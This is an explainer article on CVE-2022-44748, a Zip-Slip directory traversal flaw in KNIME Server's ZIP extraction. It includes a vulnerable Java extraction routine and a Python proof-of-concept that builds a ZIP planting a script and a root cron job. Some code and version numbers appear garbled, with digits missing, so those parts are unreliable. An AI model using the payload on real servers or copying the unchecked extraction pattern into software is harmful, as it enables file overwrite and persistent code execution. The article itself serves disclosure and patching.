CVE-2022-44748 - Zip-Slip Directory Traversal Vulnerability in KNIME Server – All You Need To Know

In late 2022, a serious directory traversal vulnerability was found in KNIME Server affecting versions since 4.3.. Tracked as CVE-2022-44748, this bug—in the archive extraction routines—lets attackers overwrite arbitrary files on the server by uploading malicious ZIP files. This security gap is also known as a "Zip-Slip" vulnerability.

In this article, we'll break down what this means, how it works (with code samples), the possible impacts, and how to fix your server.

What is "Zip-Slip"?

A "Zip-Slip" is a type of directory traversal attack where archive files (ZIP, TAR, etc.) are crafted so that, when they are extracted, some files are saved outside the intended extraction folder. By abusing how file paths are handled, an attacker can overwrite files anywhere the operating system user has write permissions.

Basic Example

If someone adds a file like ../../../../etc/passwd to a zip, and the extraction code isn't careful, it can actually write to /etc/passwd—that’s dangerous.

CVE-2022-44748 in KNIME Server: The Issue

KNIME Server is widely used for workflow automation and machine learning. Since version 4.3., its routine for extracting ZIP files (such as uploaded workflows) does not properly check file paths inside the archive.

The issue:  
> A malicious user can craft a KNIME workflow ZIP which, when uploaded, writes files to arbitrary locations on the server file system.

References:  
- KNIME Security Release Notes  
- NIST NVD: CVE-2022-44748 Details

The attacker must know the file paths they wish to overwrite.

- The KNIME Server user (the OS user running the service) must have write access to the targeted files.

Attacker crafts a malicious ZIP

The ZIP contains at least one file with a "dangerous" path, like ../../../../etc/crontab.

Possible Denial of Service: Critical files corrupted.

- Remote Code Execution (RCE): Attacker overwrites executable files/scripts that the server will later run.

Here’s a simplified example in Java, similar to what went wrong in KNIME Server

public void extractZip(File zipFile, File destDir) throws IOException {
    ZipInputStream zis = new ZipInputStream(new FileInputStream(zipFile));
    ZipEntry entry;
    while ((entry = zis.getNextEntry()) != null) {
        File newFile = new File(destDir, entry.getName());
        // Vulnerable: no check for '..' or absolute paths
        FileOutputStream fos = new FileOutputStream(newFile);
        byte[] buffer = new byte[1024];
        int len;
        while ((len = zis.read(buffer)) > ) {
            fos.write(buffer, , len);
        }
        fos.close();
    }
    zis.closeEntry();
    zis.close();
}

What's the Problem?
If entry.getName() is, for example, ../../../../etc/passwd, this function will happily overwrite /etc/passwd if permissions allow.

Here’s how an attacker might create such a malicious ZIP using Python

import zipfile

with zipfile.ZipFile("exploit.zip", "w") as zf:
    # Overwrite a cron job
    zf.writestr("../../../../tmp/evil.sh", "#!/bin/bash\necho 'Hacked!' > /tmp/hacked\n")
    zf.writestr("../../../../etc/cron.d/myjob", "* * * * * root /tmp/evil.sh\n")

After uploading exploit.zip, if the KNIME Server process can write to /tmp and /etc/cron.d, it just installed a persistent shell job.

Potential RCE: Overwrite scripts or programs that the KNIME Server process will execute.

> Note: If a user can upload and run workflows, they can already execute code as the Executor user. However, by using this exploit, they might target other services or persist their access more effectively.

No Workaround!

There are no workarounds. You must upgrade to a fixed version to protect your server.

4.15.3

If you use KNIME Server version 4.3. or above but below these, you are vulnerable.

> Official KNIME Security Page: https://www.knime.com/security/advisories#CVE-2022-44748

In Summary

CVE-2022-44748 is a serious "Zip-Slip" directory traversal vulnerability in KNIME Server's archive extraction. Attackers with upload rights and system knowledge can overwrite sensitive files—possibly leading to remote code execution. There’s no quick fix: upgrade to the patched version now.

Stay safe! Don’t assume upload is harmless, and always keep software up to date.


Further Reading & References:  
- Original CVE on NVD  
- KNIME Security Notices  
- OWASP Zip-Slip Explanation  

Timeline

Published on: 11/24/2022 07:15:00 UTC
Last modified on: 11/30/2022 19:38:00 UTC